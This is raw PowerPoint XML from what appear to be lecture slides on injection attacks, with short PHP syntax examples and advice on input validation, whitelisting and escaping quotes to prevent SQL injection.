                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2883191" y="3993908"/>
                  <a:ext cx="1224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396959B1-8FAD-5B4C-9A51-78C7A1968E05}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3846551" y="4194068"/>
                <a:ext cx="228600" cy="116640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396959B1-8FAD-5B4C-9A51-78C7A1968E05}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3810551" y="4158428"/>
                  <a:ext cx="300240" cy="188280"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2968DCE7-67FB-3346-A17D-88A28EC4217C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5621192" y="3993949"/>
            <a:ext cx="2085884" cy="534141"/>
            <a:chOff x="7270871" y="3986348"/>
            <a:chExt cx="1126080" cy="288360"/>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47E2229-5CB7-8648-924B-E9A187395808}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7270871" y="3986348"/>
                <a:ext cx="1126080" cy="141840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047E2229-5CB7-8648-924B-E9A187395808}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7251432" y="3967112"/>
                  <a:ext cx="1164763" cy="18050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6BB39F53-EBAA-1E44-8301-E0FBCAF05C8F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8260871" y="4131788"/>
                <a:ext cx="131400" cy="142920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB39F53-EBAA-1E44-8301-E0FBCAF05C8F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId10"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8241433" y="4112538"/>
                  <a:ext cx="170081" cy="181615"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C30DCC-F746-C14D-947E-724680BC7AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId11"/>
          <a:srcRect t="45423" r="30337" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991052" y="3664912"/>
            <a:ext cx="990886" cy="776320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58086A5F-C1D8-524C-8742-1303D9F5F953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10200948" y="3609989"/>
            <a:ext cx="1422400" cy="1422400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65265A8-5EF9-4340-8608-2B7ECB387CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5448630" y="3415281"/>
            <a:ext cx="2390398" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>01001     000101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51066C98-423F-044E-ABB6-B012496E23B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId11"/>
          <a:srcRect t="45423" r="30337" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057920" y="3276752"/>
            <a:ext cx="990886" cy="776320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51A696B-2005-4547-A3B6-496EEC8AB3BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057920" y="6045262"/>
            <a:ext cx="5700600" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Injection vulnerabilities are a generic issue!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396321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5CB3F18-4DE5-D64E-B255-B58B672D4750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>PHP: Hypertext Preprocessor </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77BBF7FC-BF49-724B-A38B-E10745F8FA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Server scripting language with C-like syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Access form data via global arrays $_GET, $_POST, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Can intermingle static HTML and code to dynamically generate content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>		&lt;input value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Can embed variables in double-quote strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$user = “world”; echo “Hello $user!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>or	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$user = “world”; echo “Hello” . $user . “!”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92059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1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8" name="Rectangle 1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9" name="Rectangle 1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0"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1" name="Rectangle 21">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42" name="Rectangle 23">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E7E8538-4F1C-FC47-845D-76ADBD6D7FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136849" y="1348844"/>
            <a:ext cx="5117848" cy="2622651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" cap="all" spc="-100" dirty="0"/>
              <a:t>Preventing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" b="0" cap="all" spc="-100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" cap="all" spc="-100" dirty="0"/>
              <a:t>Injection ATTACKS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 25">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27">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29">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31">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A picture containing clipart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3A5CCA-FD1F-8F4F-B7B4-77C81D61B1E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7485324" y="1357007"/>
            <a:ext cx="3513108" cy="4229049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA27B083-EF06-174A-91E1-42C83EF8D842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20160852">
            <a:off x="6011982" y="1669977"/>
            <a:ext cx="5339923" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Validate all the inputs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41777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63490" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{899EE703-705C-354F-950E-49CCD082D9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73E069D-5938-2246-B21B-987232E666D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963691" y="1000370"/>
            <a:ext cx="6212310" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validate all inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filter out any character that has special meaning: apostrophes, semicolons, percent symbols, hyphens, underscores, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check the data type (e.g., input must be an integer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitelist permitted characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blacklisting “bad” characters doesn’t work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forget to filter out some characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Could prevent valid input (e.g., last name O’Brien)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allow only well-defined set of safe values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set implicitly defined through regular expressions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3406297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64514" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F489F36-1A3B-4242-BA31-668ADC13CA62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping Quotes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2B35F5-BB06-B141-8A01-B885617A7A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963691" y="1000370"/>
            <a:ext cx="6212310" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Special characters such as ’ provide distinction between data and code in queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For valid string inputs containing quotes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use escape characters to prevent the quotes from becoming part of the query code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Different databases have different rules for escaping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o’connor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) = o\’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o’connor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) = o’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272599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ipart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3A5CCA-FD1F-8F4F-B7B4-77C81D61B1E4}"/>
